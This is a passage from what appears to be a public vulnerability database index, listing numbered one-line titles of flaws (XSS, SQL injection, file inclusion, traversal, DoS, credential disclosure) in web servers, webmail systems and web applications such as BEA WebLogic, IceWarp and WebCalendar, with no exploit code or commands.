XSS [24123] uniForum websecadmin.aspx Multiple Field XSS [24100] Quick 'n Easy Web Server Crafted File Name ASP Code Disclosure [24099] Baby Web Server Crafted File Name ASP Code Disclosure [24062] RealNetworks Multiple Products Web Page Embedded Player Content Overflow [24060] webcheck Generated Report Tooltip XSS [24045] phpWebSite article.php sid Parameter SQL Injection [24044] phpWebSite friend.php sid Parameter SQL Injection [24029] BEA WebLogic Portal JSR-168 Portlets Cached Display Cross Session Disclosure [24028] BEA WebLogic Unspecified Internal Servlet Arbitrary File Access [24027] BEA WebLogic Non-canonicalized XML Processing DoS [24023] 1WebCalendar mainCal.cfm SQL Injection [24022] 1WebCalendar /news/newsView.cfm NewsID Parameter SQL Injection [24021] 1WebCalendar viewEvent.cfm EventID Parameter SQL Injection [24014] MailEnable WebMail Malformed Encoded Quoted-printable Mail DoS [23946] Maian Weblog mail.php Multiple Parameter SQL Injection [23945] Maian Weblog print.php Multiple Parameter SQL Injection [23939] BorderWare MXtreme Mail Firewall Web Administration Unspecified Issue [23877] Winmail Webmail Multiple Unspecified Issues [23805] Easy File Sharing Web Server Unspecified System File Disclosure [23798] IBM WebSphere Unspecified JSP Source Disclosure [23795] Easy File Sharing Web Server option.ini Remote Information Disclosure [23794] Easy File Sharing Web Server /log/ Directory Log Disclosure [23793] Easy File Sharing Web Server File/Folder Description Field XSS [23792] Easy File Sharing Web Server Format String DoS [23791] Easy File Sharing Web Server Full Path Request Arbitrary File Upload [23727] XEROX CopyCentre/WorkCentre Web Server Unspecified Memory Corruption DoS [23636] Apple Safari WebKit HTML Processing Overflow [23635] WebGUI setParent Function User Permission Check Failure [23634] WebGUI editBranchSave Method User Permission Check Failure [23633] WebGUI Package Deployment Permission Check Failure [23628] SAP Web Application Server HTTP Response Prefixing Issue [23621] Archangel Weblog /admin/index.php index Parameter Remote File Inclusion [23620] Archangel Weblog Cookie ba_admin Variable Admin Authentication Bypass [23543] NetworkActiv Web Server Crafted Filename Request Script Source Disclosure [23530] iGENUS Webmail config_inc.php SG_HOME Parameter Local File Inclusion [23512] ArGoSoft Mail Server Pro Webmail viewheaders Multiple Field XSS [23502] Issue Dealer Local Weblog Publisher Issue Disclosure [23500] South River WebDrive Name Field Overflow DoS [23492] Uniden UIP1868P Default Web Admin Password [23478] Website Generator process3.php Arbitrary PHP Code Execution [23473] ArGoSoft Mail Server Pro Webmail viewheaders UIDL Parameter Traversal Arbitrary File Access [23469] WEBInsta Limbo Contact Form Arbitrary HTML Injection [23468] DEV web management system register.php mesto Parameter XSS [23411] CPG Dragonfly CMS Web_Links Module Multiple Parameter XSS [23387] Web Calendar Pro dropbase.php tabls Parameter SQL Injection DoS [23384] SquirrelMail webmail.php right_frame Parameter XSS [23338] IBM Lotus Domino Web Server Unspecified Malformed URL DoS [23336] MUTE P2P MWebCache Host Selection Information Disclosure [23334] IBM Lotus Domino Web Server Unspecified Security Issue (KSPR66USSU) [23333] IBM Lotus Domino Web Server Unspecified Memory Overwrite [23332] IBM Lotus Domino Web Server Document Processing DoS [23331] IBM Lotus Domino Web Navigator Malformed URL Notes DoS [23278] PerlBLOG POST Method weblog.pl Multiple Parameter XSS [23277] PerlBLOG weblog.pl Traversal Arbitrary File Access [23276] PerlBLOG weblog.pl Arbitrary File Creation [23266] WordPress wp-comments-post.php Author's Website Field XSS [23262] V-webmail help.php Direct Request Path Disclosure [23261] V-webmail frameset.php rframe Variable Arbitrary Remote HTML Inclusion [23260] V-webmail preferences.personal.php newid Parameter XSS [23236] @Mail Webmail Message HTML Image Tag XSS [23228] Microsoft Outlook Web Access .INC File Direct Request Source Disclosure [23225] webSPELL search.php SQL Injection [23134] Microsoft Windows Web Client Service Crafted WebDAV Request Overflow [23105] WebGUI Anonymous Registration Restriction Bypass [23090] noweb Multiple Script Insecure Temporary File Creation [23088] Sun Java Web Start Untrusted Application Privilege Escalation [23033] MailEnable Enterprise Edition Webmail Crafted Quoted-printable Email DoS [22990] NukedWeb GuestBookHost Multiple Field XSS [22971] cPanel dowebmailforward.cgi fwd Parameter XSS [22906] cPanel webmailaging.cgi numdays Parameter XSS [22893] Mozilla Multiple Products Location/Navigation Objects QueryInterface Memory Corruption [22892] Mozilla Multiple Products Web Page Title Processing Overflow DoS [22882] @Mail Webmail compose.pl unique Variable Traversal Arbitrary File Upload [22813] Connect Daily Web Calendar Anonymous Viewing Calendar Disclosure [22812] Connect Daily Web Calendar Unapproved Item Disclosure [22807] UebiMiau Webmail HTML Email Body XSS [22798] GNU CLISP SYSLOG Interface Format String [22778] BEA WebLogic Cross Domain Administrator Access [22777] BEA WebLogic RMI MBean Attribute Disclosure [22776] BEA WebLogic Server Log Remote Disclosure [22775] BEA WebLogic Configuration Auditing Log Cleartext Credential Disclosure [22774] BEA WebLogic Application Code Password Decryption [22773] BEA WebLogic Security Provider Activiation Weakness [22772] BEA WebLogic Connection Filters Unspecified Remote DoS [22771] BEA WebLogic Untrusted Application SSL Identity Disclosure [22770] BEA WebLogic Admin Console JNDI Resource Security Policy Issue [22769] BEA WebLogic RDBMS Authentication config.xml Cleartext Password Disclosure [22768] BEA WebLogic Portal Deployment Descriptors File Source Disclosure [22767] BEA WebLogic WSRP Crafted Request Restriction Bypass [22758] WeBWorK Unspecified Arbitrary Command Execution [22753] my little weblog weblog.php BBcode link Tag XSS [22741] SaralBlog New Comment Website Field XSS [22722] Phpclanwebsite pollresults.php poll_id Parameter XSS [22721] Phpclanwebsite uploader.php Path Disclosure [22720] Phpclanwebsite index.php par Parameter SQL Injection [22699] Note-A-Day Weblog /archive Directory Direct Request User Credential Disclosure [22675] IronWall Web Server Traversal Arbitrary File Access [22670] WebspotBlogging login.php Username Field SQL Injection [22631] Kerio WinRoute Firewall Unspecified Web Browsing DoS [22627] Phpclanwebsite img BBcode Tag XSS [22617] Oracle E-Business Suite/Applications Web Applications Desktop Integration HTTP Information Disclosure [22420] Chimera Web Portal System linkcategory.php id Parameter SQL Injection [22398] Web Wiz Forums search_form.asp search Parameter XSS [22387] OrjinWeb E-commerce index.php page Parameter Remote File Inclusion [22383] Chimera Web Portal System modules.php Multiple Parameter XSS [22339] Clearswift MIMEsweeper/WEBsweeper Crafted Executable Filter Bypass [22295] TheWebForum register.php www Parameter XSS [22294] TheWebForum login.php Username Field SQL Injection [22289] WebGUI DataForm Entries XSS [22280] SysCP WebFTP Module webftp.php webftp_language Parameter Local File Inclusion [22244] Apple AirPort Extreme Base Station Crafted Packet Network Interface DoS [22227] WebEOC Failed Login Account Lockout DoS [22222] PHP Web Statistik Referer Field Disk Space Exhaustion DoS [22204] Open-Xchange Webmail HTML Attachment Arbitrary Script Insertion [22164] Tolva PHP website system usermods.php ROOT Parameter Remote File Inclusion [22148] Web Wiz Multiple Products check_user.asp txtUserName Parameter SQL Injection [22140] VEGO Web Forum index.php theme_id Parameter SQL Injection [22119] VMware ESX Server Management Interface Unspecified XSS [22113] RoundCube Webmail _task Variable Path Disclosure [22102] IBM WebSphere /TechnologySamples/MovieReview2_1/ Multiple Field XSS [22101] IBM WebSphere /TechnologySamples/Subscription/SubscriptionJSP.jsp Email Field XSS [22100] IBM WebSphere /TechnologySamples/BulletinBoard/index.html message Field XSS [22099] IBM WebSphere /PlantsByWebSphere/login.jsp Email Field XSS [22082] IceWarp WebMail /mail/include.html Crafted HTTP_USER_AGENT Arbitrary File Access [22081] IceWarp WebMail /mail/index.html lang_settings Parameter Remote File Inclusion [22080] IceWarp WebMail /mail/settings.html Language Parameter Local File Inclusion [22079] IceWarp WebMail /dir/include.html lang Parameter Local File Inclusion [22078] IceWarp WebMail /admin/inc/include.php Multiple Parameter Remote File Inclusion [22077] IceWarp WebMail /accounts/inc/include.php Multiple Parameter Remote File Inclusion [22043] DEV web management system add.php Multiple Parameter XSS [22042] DEV web management system download_now.php target Parameter SQL Injection [22041] DEV web management system getfile.php cat Parameter SQL Injection [22040] DEV web management system openforum.php cat Parameter SQL Injection [22000] Michael Arndt WebCal Multiple Function XSS [21999] Michael Arndt WebCal webcal.cgi Multiple Parameter XSS [21940] Business Objects WebIntelligence Arbitrary User Account Lockout [21915] Adaptive Website Framework (AWF) Unspecified Script mode Variable Path Disclosure [21914] Adaptive Website Framework (AWF) Multiple Templates page Parameter XSS [21910] WebDB Search Module search Parameter SQL Injection [21903] MarmaraWeb E-commerce index.php page Variable Arbitrary Command Execution [21902] MarmaraWeb E-commerce index.php page Parameter XSS [21815] BTGrup Admin WebController Script Login Multiple Field SQL Injection [21791] WebGlimpse webglimpse.cgi Multiple Parameter XSS [21786] Hot Banana Web Content Management Suite /search/index.cfm keywords Parameter XSS [21691] PHPWebGallery picture.php image_id Parameter SQL Injection [21690] PHPWebGallery category.php search Parameter SQL Injection [21689] PHPWebGallery comments.php Multiple Parameter SQL Injection [21656] phpWebThings myaccount.php sel_avatar Parameter SQL Injection [21655] phpWebThings index.php menuoption Parameter SQL Injection [21654] phpWebThings guestbook.php tekst Parameter SQL Injection [21653] phpWebThings forum_write.php Multiple Parameter SQL Injection [21652] phpWebThings forum_edit.php Multiple Parameter SQL Injection [21651] phpWebThings forum.php Multiple Parameter SQL Injection [21650] phpWebThings download.php ref Parameter SQL Injection [21597] Basilix Webmail Email Multiple Field XSS [21596] Basilix Webmail id Parameter SQL Injection [21595] Basilix Webmail Attachment Crafted POST Arbitrary File Access [21594] Basilix Webmail tmp Directory Permission Weakness Attachment Disclosure [21588] BEA WebLogic LoginForm.jsp ADMINCONSOLESESSION Parameter Traversal Arbitrary File Access [21587] BEA WebLogic /examplesWebApp/JWS_WebService.jsp XSS [21572] Website Baker user: Field SQL Injection [21469] Web4Future KeyWord Frequency Counter index.cgi url Parameter XSS [21468] Web4Future eCommerce viewbrands.php bid Parameter SQL Injection [21467] Web4Future eCommerce index.php Multiple Parameter SQL Injection [21466] Web4Future eCommerce view.php Multiple Parameter SQL Injection [21457] Web4Future Affiliate Manager Pro functions.php pid SQL Injection [21448] Webalizer Xtended Malformed DNS Hostname DoS [21447] Webalizer Xtended Unspecified XSS [21446] Webalizer Xtended DNS Resolver Overflow [21423] Web4Future Portal Solutions arhiva.php dir Parameter Traversal Arbitrary File Access [21422] Web4Future Portal Solutions comentarii.php idp Parameter SQL Injection [21421] Web4Future eDating Professional fq.php cid Parameter SQL Injection [21420] Web4Future eDating Professional articles.php cat Parameter SQL Injection [21419] Web4Future eDating Professional gift.php cid Parameter SQL Injection [21418] Web4Future eDating Professional index.php Multiple Parameter SQL Injection [21383] WebCalendar layers_toggle.php ret Variable HTTP Response Splitting [21382] WebCalendar edit_report_handler.php time_range Parameter SQL Injection [21366] CGI Online Worldweb Shopping (COWS) diagnose.cgi XSS [21365] CGI Online Worldweb Shopping (COWS) compatible.cgi XSS [21288] WASD Web Server PerlRTE_example1.pl name Variable Format String [21276] Apple Mac OS X WebKit Crafted Content Overflow [21222] Webmin/Usermin miniserv.pl Format String Remote Code Execution [21221] Gallery Add Image From Web XSS [21220] WebCalendar export_handler.php Arbitrary Data File Overwrite [21219] WebCalendar export_handler.php Multiple Parameter SQL Injection [21218] WebCalendar edit_template.php template Parameter SQL Injection [21217] WebCalendar admin_handler.php Multiple Parameter SQL Injection [21216] WebCalendar activity_log.php startid Parameter SQL Injection [21212] PHP Web Statistik pixel.php Referer Header XSS [21211] PHP Web Statistik stat.php lastnumber Variable Resource Consumption DoS [21210] PHP Web Statistik logdb.dta Log Database Remote Disclosure [21209] PHP Web Statistik /stat/stat.cfg Remote Information Disclosure [21208] PHP Web Statistik stat.php lastnumber Parameter XSS [21207] FreeWebStat pixel.php Multiple Parameter XSS [21129] AllWeb Search index.php search Parameter SQL Injection [21084] Softbiz Web Host Directory Failed SQL Query Path Disclosure [21083] Softbiz Web Host Directory Search Engine SQL Injection [21082] Softbiz Web Host Directory email.php h_id Parameter SQL Injection [21081] Softbiz Web Host Directory browsecats.php cid Parameter SQL Injection [21080] Softbiz Web Host Directory review.php sbres_id Parameter SQL Injection [21079] Softbiz Web Host Directory search_result.php cid Parameter SQL Injection [21004] IBM WebSphere Application Server (WAS) for z/OS BBOORB Module Double-free DoS [20987] BEA WebLogic Restricted Page Multiple Slash Authorization Bypass [20950] Sony CD SunnComm MediaMax Uninstallation AxWebRemoveCtrl ActiveX Control Arbitrary Code Execution [20945] phpWebThing download.php file Parameter SQL Injection [20922] Revize CMS setWebSpace.jsp Multiple Parameter XSS [20920] Revize CMS query_input.jsp webspace Parameter SQL Injection [20908] LiteSpeed Web Server WebAdmin confMgr.php m Parameter XSS [20907] Spymac WebOS Notes index.php Multiple Parameter XSS [20906] Spymac WebOS Blogs blog.php caldate Parameter XSS [20905] Spymac WebOS Blogs blog_edit_entry.php entry Parameter XSS [20904] Spymac WebOS Blogs blog_newentry_comment.php entry Parameter XSS [20903] Spymac WebOS Blogs blog_newentry.php Multiple Parameter XSS [20902] Spymac WebOS Blogs index.php curr Parameter XSS [20878] Barracuda Spam Firewall User Interface Multiple Field XSS [20877] Belkin Wireless Router Web Management Multiple Session Authentication Bypass [20872] Webmin RPM Installation /var/webmin Permission Weakness Information Disclosure [20721] phpWebThing forum.php forum Parameter XSS [20717] SAP Web Application Server Test Application BspApplication Field XSS [20716] SAP Web Application Server frameset.htm sap-syscmd Parameter XSS [20715] SAP Web Application Server Error Page XSS [20714] SAP Web Application Server sap-exiturl Header HTTP Response Splitting [20676] Linux Kernel sysctl Interface Unregistration Local DoS [20671] Sony/Lenovo InstallShield DWUSWebAgent.WebAgent.1 ActiveX Arbitrary Registry Entry Access [20628] Oracle Application Server Web Cache Unspecified Trivial Remote DoS [20627] Oracle Application Server Web Cache Administrator HTTP Unspecified Issue [20626] Oracle Application Server Web Cache HTTP Unspecified Difficult Issue [20625] Oracle Application Server Web Cache HTTP Unspecified Trivial Information Disclosure [20611] Oracle Database Programmatic Interface alter session Unspecified SQL Issue [20522] Invision Power Board Admin Interface Calendar Title XSS [20521] Invision Power Board Admin Interface Group Icon Image Field XSS [20520] Invision Power Board Admin Interface New Member Creation XSS [20518] Invision Power Board Admin Interface Member Profile Multiple Field XSS [20517] Invision Power Board Admin Interface APC Notes XSS [20490] Rockliffe MailSite Express WebMail AttachPath Arbitrary Attachment Access [20489] Rockliffe MailSite Express WebMail File Upload Arbitrary Command Execution [20488] Rockliffe MailSite Express WebMail Email Message Body XSS [20453] F-Secure Products Web Console Traversal Arbitrary File Access [20447] Hasbani WindWeb Integrated Web Server Malformed GET Request DoS [20441] phpWebThing forum.php forum Parameter SQL Injection [20431] Apple Mac OS X Unspecified Kernel Interface Local Information Disclosure [20375] Hitachi Web Page Generator Enterprise Session Manager Cookie Secure Attribute Issue [20327] RTIS WebAdmin Login Multiple Field SQL Injection [20317] RSA ACE/Agent for Web image onError Parameter XSS [20293] PHP-Nuke Web_Links Module description Parameter SQL Injection [20269] TWIG Webmail config.php Cookie Cleartext Authentication Credential Storage [20249] eBASEweb Unspecified SQL Injection [20240] WebX HTTP_REFERER Authentication Information Remote Disclosure [20238] Webmin run.cgi Temp File Permission Weakness Arbitrary Command Execution [20218] Macromedia JRun Unspecified WEB-INF / META-INF Privilege Escalation [20204] MaxWebPortal db2000.mdb Remote Database Disclosure [20190] Oracle Internet Application Server (IAS) WebDB/Portal Component mod_sql URL Query String SQL Injection [20187] Oracle Internet Application Server (IAS) WebDB/Portal Component Port Listener HTTP Request DAD File Disclosure [20151] RSA Authentication Agent for Web IISWebAgentIF.dll Redirect Overflow [20114] BEA WebLogic Heavy CPU Load Audit Event Logging Severity Mismatch [20113] BEA WebLogic Invalid Login Attempt Threshold Bypass [20112] BEA WebLogic Servlet Relative Forwarding DoS [20111] BEA WebLogic Incorrect Log Saturation Logging Failure [20110] BEA WebLogic Multicast Message Cleartext Information Disclosure [20109] BEA WebLogic weblogic.Deployer t3 Protocol Encryption Failure [20108] BEA WebLogic Failed Login Administrator Account Lockout DoS [20107] BEA WebLogic IIOP Protocol Subject Cleartext Password Disclosure [20106] BEA WebLogic on Windows Registry Cleartext Password Disclosure [20105] BEA WebLogic -D Switch Server Log Cleartext Credential Disclosure [20104] BEA WebLogic fullyDelegateAuthorization Servlet Constraint Bypass [20103] BEA WebLogic Configuration Wizard Private Key Passphrase Cleartext Disclosure [20102] BEA WebLogic Cross Platform Ruleset Implementation Weakness [20101] BEA WebLogic Unspecified Internal Servlet Arbitrary File Access [20100] BEA WebLogic Servlet root URL Pattern Constraint Bypass [20099] BEA WebLogic Derived Principal Privilege Escalation [20098] BEA WebLogic nodemanager.config CustomTrustKeyStorePassPhrase Cleartext Disclosure [20097] BEA WebLogic Internal IP Address Disclosure [20096] BEA WebLogic WebApp/EJB run-as Security Role Privilege Escalation [20095] BEA WebLogic Consecutive Non-SSL T3 Connection Encryption Failure [20094] BEA WebLogic One-way SSL Session Encryption Failure [20093] BEA WebLogic Multiple Unspecified XSS [20092] BEA WebLogic Unspecified Thread Hang DoS [20091] BEA WebLogic Open SSL Connection Saturation DoS [20090] BEA WebLogic server.same Buffer Cleartext Password Disclosure [20007] Ensim WEBppliance ocw_login_username Parameter XSS [19933] WebGUI Asset.pm Asset Addition Arbitrary Code Execution [19926] GFI MailSecurity HTTP Management Interface Request Header Overflow [19898] Microsoft Windows Web View Arbitrary Script Injection [19881] Sun Java System Directory Server Unspecified HTTP Admin Interface Issue [19869] Webroot Desktop Firewall DeviceIoControl() Local DoS [19868] Webroot Desktop Firewall PWIWrapper.dll FirewallNTService.exe Overflow [19854] Symantec AntiVirus Scan Engine Administrative Interface HTTP Header Overflow [19852] Forum Web Server postfile2.htm File Description Field XSS [19851] Forum Web Server post1.htm Subject Field XSS [19835] phpWebSite notes Module ANN_id SQL Injection [19834] IBM Lotus Domino webadmin.nsf New Folder Dialog Traversal File Enumeration [19833] SqWebMail Error Message Account Enumeration [19832] BEA WebLogic NodeManagerMBean.CertificatePassword Password Disclosure [19831] IceWarp WebMail help.html Traversal Arbitrary File Access [19830] IceWarp WebMail logout.html Traversal Arbitrary File/Directory Deletion [19829] IceWarp WebMail bwlist_inc.html Direct Request Path Disclosure [19828] IceWarp WebMail calendar_w.html createdataCX Parameter XSS [19827] IceWarp WebMail calendar_m.html createdataCX Parameter XSS [19826] IceWarp WebMail calendar_d.html createdataCX Parameter XSS [19825] IceWarp WebMail blank.html id Parameter XSS [19816] Virtools Web Player Filename Traversal Arbitrary File Overwrite [19815] Virtools Web Player Filename Processing Overflow [19805] BEA WebLogic weblogic-rar.xml Password Encryption Information Disclosure [19804] BEA WebLogic filerealm.properties Password Encryption Information Disclosure [19803] BEA WebLogic config.xml Password Encryption Information Disclosure [19801] BEA WebLogic Weblogic.admin JDBCConnectionPoolRuntimeMBean Cleartext Password Disclosure [19800] BEA WebLogic CredentialMapper Cleartext Password Local Disclosure [19765] Ganglia PHP RRD Web Client graph.php command Variable Arbitrary Command Execution [19754] Mac OS Personal Web Sharing Long Password Overflow DoS [19729] 4D WebSTAR IMAP MacOS Client Unspecified Potential DoS [19714] Barracuda Spam Firewall web-ui Multiple CGI Unauthenticated Access [19709] Apple Safari Remote Web Archive Processing XSS [19663] ContentServ about.php ctsWebsite Parameter Traversal Arbitrary File Access [19659] Twilight Utilities Web Server (TW-webserver) postfile.exe attfile Parameter Traversal Arbitrary File Access [19658] Twilight Utilities Web Server (TW-webserver) postfile.exe attfile Variable Remote Overflow [19641] Orion Web Server Error Page XSS [19613] Spymac WebOS showthread.php Multiple Parameter XSS [19593] Ingate Firewall/SIParator Default Route Interface Packet Spoofing [19575] Webmin/Usermin miniserv.pl Metacharacter PAM Authentication Bypass [19517] man2web man2html Arbitrary Command Execution [19516] man2web man-cgi Arbitrary Command Execution [19515] man2web man2web CGI Arbitrary Command Execution [19498] CjWeb2Mail web2mail.php emsg Parameter XSS [19497] CjWeb2Mail thankyou.php Multiple Parameter XSS [19491] Content2Web index.php show Variable Arbitrary File Inclusion [19490] Content2Web index.php show Variable Path Disclosure [19489] Content2Web index.php show Parameter XSS [19488] Content2Web index.php show Parameter SQL Injection [19468] Mbedthis AppWeb Empty OPTIONS Request Remote DoS [19465] vxWeb GET Request Overflow Remote DoS [19438] Spymac WebOS index.php category Parameter XSS [19381] PunBB Admin Interface Unspecified SQL Injection [19309] Sun Java System Web Proxy Server Unspecified DoS (6291212) [19308] Sun Java System Web Proxy Server ns-proxy Crafted POST Request DoS [19307] Sun Java System Web Proxy Server Unspecified DoS (6264430) [19283] WebCalendar functions.php includedir Parameter Remote File Inclusion [19262] SqWebMail in MSIE Conditional Comments XSS [19252] Nombas ScriptEase Webserver Edition viewcode.jse Traversal Arbitrary File Access [19233] WEB//NEWS /actions Directory Multiple Script Path Disclosure [19232] WEB//NEWS print.php id Parameter SQL Injection [19231] WEB//NEWS news.php Multiple Parameter SQL Injection [19230] WEB//NEWS startup.php Cookie SQL Injection [19226] WebArchiveX ActiveX Multiple Method Arbitrary File Read/Write [19225] Open WebMail Error Message Session ID XSS [19204] Oracle Webcache OHS Encryption Specification Downgrade Weakness [19200] Express-Web Content Management System default.asp email Parameter XSS [19199] Express-Web Content Management System login.asp referer XSS [19180] Macromedia Flash Player Web Page Termination Failure Remote DoS [19178] Plug and Play Web Server FTP Service Multiple Command Remote Overflow DoS [19173] Squid Web Proxy Cache @@ Security Control Bypass [19158] BEA WebLogic Admin Console View Server Log XSS [19150] Savant Web Server Registry Cleartext Password Disclosure [19148] WebGUI WebGUI.pm Unspecified Arbitrary Perl Code Execution [19147] WebGUI International.pm Unspecified Arbitrary Perl Code Execution [19146] WebGUI Help.pm Unspecified Arbitrary Perl Code Execution [19140] Beehive Forum Multiple Script $_GET webtag Parameter SQL Injection [19105] OpenBSD PF Alternate Interface Rule Bypass [19097] IBM Lotus Domino Web Server DOMLOG.NSF Logging HTTP Authenticate Header Overflow [19091] phpWebNotes api.php t_path_core Parameter Remote File Inclusion [19047] SqWebMail HTML Email img src Tag Arbitrary Script Insertion [19025] IBM Tivoli WebSEAL Inactive Session Re-authentication Weakness On Failover [19022] DSM Light Web File Browser explorer.php wdir Variable Arbitrary File Retrieval [18967] NetworkActiv Web Server Traversal Arbitrary File Access [18954] WebCalendar send_reminders.php includedir Parameter Remote File Inclusion [18948] SqWebMail Attached File Arbitrary Script Insertion [18936] SaveWebPortal Multiple HTTP Header Arbitrary Script Injection [18935] SaveWebPortal menu_sx.php Multiple Parameter XSS [18934] SaveWebPortal menu_dx.php Multiple Parameter XSS [18933] SaveWebPortal header.php Multiple Parameter XSS [18932] SaveWebPortal footer.php Multiple Parameter XSS [18931] SaveWebPortal menu_sx.php CONTENTS_Dir Parameter Remote File Inclusion [18930] SaveWebPortal menu_dx.php SITE_Path Parameter Remote File Inclusion [18929] SaveWebPortal menu_sx.php Traversal Arbitrary File Access/Execution [18928] SaveWebPortal menu_dx.php Traversal Arbitrary File Access/Execution [18923] BEA WebLogic Portal User-Entitlement Crafter URL Bypass [18855] BRS WebWeaver HTTP User-Agent Header Remote Overflow [18810] LocalWEB2000 users.lst CleartextPassword Disclosure [18799] phpWebSite index.php module Parameter SQL Injection [18793] Apple Mac OS X Server Weblog Server Multiple Parameter XSS [18792] Apple WebKit Safari Crafted PDF Arbitrary Command Execution [18788] Apple Mac OS X SecurityInterface Password Assistant Recently-suggested Password Disclosure [18759] IBM Tivoli WebSEAL Client Certification Authentication Login Restriction Bypass [18724] IBM Tivoli SecureWay WebSEAL XSS Attempt Logging Failure [18723] IBM Tivoli SecureWay WebSEAL user-and-group LDAP ACL Bypass [18722] IBM Tivoli SecureWay WebSEAL Error Page XSS [18665] Acunetix Web Vulnerability Scanner HTTP Sniffer Overflow DoS [18611] Microsoft IE Web Folder Cross-Domain Code Execution [18606] Microsoft Windows Telephony Application Programming Interface (TAPI) Overflow [18562] Baby Web Server Arbitrary Remote File Write [18525] NetworkActiv Web Server Parameter XSS [18524] web content management AddModifyInput.php Remote Privilege Escalation [18523] web content management List.php strTable Parameter XSS [18522] web content management validsession.php strRootpath Parameter XSS [18495] Metasploit Framework msfweb Defanged Mode Remote Bypass [18465] McAfee WebShield Unspecified Default Account [18345] Website Baker Media Upload Extension Validation Arbitrary Code Execution [18344] Website Baker Multiple Unspecified Scripts Direct Request Path Disclosure [18343] Website Baker browse.php Malformed Input Path Disclosure [18342] Website Baker browse.php dir Parameter XSS [18330] Thomson NETg Web Skill Vantage Manager Login SQL Injection [18272] Beehive Forum Multiple Script $_GET webtag Parameter XSS [18267] SPI Dynamics WebInspect Report Arbitrary Script Insertion [18263] KeyFocus (KF) Web Server Traversal Arbitrary Directory Listing [18225] Oracle 9iAS Web Cache Multiple Unspecified Overflows [18163] Website Generator img_library.php Image Upload Preview Arbitrary PHP Code Execution [18162] Website Generator banner_library.php theme Parameter XSS [18161] Website Generator a.php theme Parameter XSS [18160] Website Generator confirm.php theme Parameter XSS [18159] Website Generator td.php theme Parameter XSS [18158] Website Generator table.php theme Parameter XSS [18157] Website Generator colorpicker.php theme Parameter XSS [18156] Website Generator img_popup.php img_url Parameter XSS [18155] Website Generator spaw_control.class.php Direct Request Path Disclosure [18140] dxxo Count Web Statistics StatDay.asp Multiple Parameter SQL Injection [18139] dxxo Count Web Statistics StatMonth.asp Multiple Parameter SQL Injection [18138] dxxo Count Web Statistics StatYear.asp QYear Parameter SQL Injection [18064] Novell GroupWise WebAccess E-Mail IMG SRC XSS [18043] Oracle Web Conferencing HTTP Unspecified Information Disclosure [17996] Sybase EAServer WebConsole jagadmin Default Account [17995] Sybase EAServer WebConsole TreeAction.do Parameter Remote Overflow [17987] punBB Admin Interface Multiple Unspecified SQL Injection [17982] MailEnable Professional Webmail Printable Encoded Item DoS [17981] MailEnable Professional Webmail Multiple Method Malformed Header DoS [17884] IBM Lotus Notes Web Mail Attachment HTML Injection [17881] WPS Web-Portal-System wps_shop.cgi art Parameter Arbitrary Command Injection [17872] WebEOC Crafted URI Authentication Bypass [17871] WebEOC Multiple Method Information Disclosure [17870] WebEOC Multiple Unspecified SQL Injections [17869] WebEOC Large File Upload Memory Consumption DoS [17868] WebEOC Multiple Unspecified XSS [17867] WebEOC Information Storage Encryption Weakness [17866] WebEOC Shared Secret Key Arbitrary Installation Information Disclosure [17860] Microsoft Windows NULL Session MSRPC Interface Remote eventlog Disclosure [17859] Microsoft Windows NULL Session svcctl MSRPC Interface SCM Service Enumeration [17854] Clearswift MIMEsweeper for Web ActiveX XML Encapsulation Filtering Bypass [17850] Apple Darwin Streaming Server Web Admin Crafted MS-DoS Device Name Script DoS [17826] IISWorks ASPWebMail Webmail.mdb Remote User Database Disclosure [17818] Willing Webcam Registry Cleartext License Information Disclosure [17791] SecureLinx SLC Console Manager Web Server Arbitrary File Download [17790] phpWebSite Cookie SQL Injection [17789] phpWebSite index.php Search Module mod Parameter Traversal Arbitrary File Access [17788] phpWebSite index.php Search Module Multiple Parameter SQL Injection [17623] VERITAS Backup Exec Web Admin Console (BEWAC) Local Overflow [17603] Dynamic Biz Website Builder logon.asp Password Field SQL Injection [17581] WebCalendar assistant_edit.php Unauthenticated Access [17480] Savant Web Server Encoded Traversal Arbitrary Command Execution [17463] Novell NetWare websinfo.bas Sample Application Information Disclosure [17453] Dillo Web Browser FTP/Downloads dpis SMTP Security Issue [17452] Dillo Web Browser html.c Unspecified Security Issue [17451] Dillo Web Browser FTP Plugin Shell Escaping Code Issue [17415] amaroK Web Frontend globals File Unspecified Issue [17404] JBoss org.jboss.web.WebServer Class Version Disclosure [17403] JBoss org.jboss.web.WebServer Class % File Request Source Disclosure [17402] JBoss org.jboss.web.WebServer Class Crafted Request Path Disclosure [17393] NanoBlogger Unspecified Traversal Arbitrary Weblog Directory Creation [17388] Sun ONE Messaging Server Webmail XSS [17382] Yaws Web Server Crafted URI Remote DoS [17381] Yaws Web Server upload.yaws Unspecified Issue [17380] Yaws Web Server Unspecified XSS [17379] Yaws Web Server list_to_atom/1 Function Remote DoS [17378] Yaws Web Server Unspecified XSS [17377] Yaws Web Server Unspecified Security Bug [17375] Yaws Web Server .yaws Script Null Byte Request Source Code Disclosure [17309] Microsoft Windows Web Client Request Processing Remote Code Execution [17307] Microsoft Exchange Outlook Web Access HTML Email XSS [17299] Sun Java Web Start Untrusted Application Privilege Escalation [17290] Webfresh Guest Book guest.cgi Name XSS [17287] WebHints hints.pl Arbitrary Command Execution [17252] IBM AIX diagTasksWebSM Command Line Argument Local Overflow [17241] Novell NetMail WebAccess/WebMail Agent Folder Rename Overflow [17240] Novell NetMail WebAccess iCal Module Calendar Display Field XSS [17156] Sawmill Web Server Mode Crafted POST Request DoS [17124] Microsoft IIS Malformed WebDAV Request DoS [17110] Novell GroupWise webacc User.html Parameter Traversal Arbitrary File Access [17106] WWWeb Concepts Events System login.asp Password Field SQL Injection [17091] JavaMail API web.xml Server Information Disclosure [17085] Popper Webmail childwindow.inc.php form Parameter Remote File Inclusion [17084] LiteWeb Malformed URI Restricted File Access Bypass [17041] IBM WebSphere Application Server (WAS) Administrative Console Authentication Overflow [16981] Cherokee Web Server Port Bind Privilege Drop Weakness [16980] Cherokee Web Server URI Traversal Arbitrary File Access [16934] MyBulletinBoard (MyBB) usercp.php User Profile website Field XSS [16917] NikoSoft WebMail Unspecified XSS [16910] PicoWebServer Unicode HTTP Request Remote Overflow [16888] NS WebMail Unspecified XSS [16861] Athena Web athenareg.php pass Variable Command Execution [16850] WEB-DAV Linux File System (davfs2) UNIX Permission Bypass [16847] MaxWebPortal password.asp memKey Parameter SQL Injection [16844] BEA WebLogic Server Console Returned Document XSS [16843] BEA WebLogic Login Exception Authentication Failure Reason Disclosure [16842] BEA WebLogic Active Directory LDAP Access Persistence [16841] BEA WebLogic Authentication Provider Unspecified Privilege Escalation [16840] BEA WebLogic Unspecified Remote DoS [16839] BEA WebLogic LDAP Server 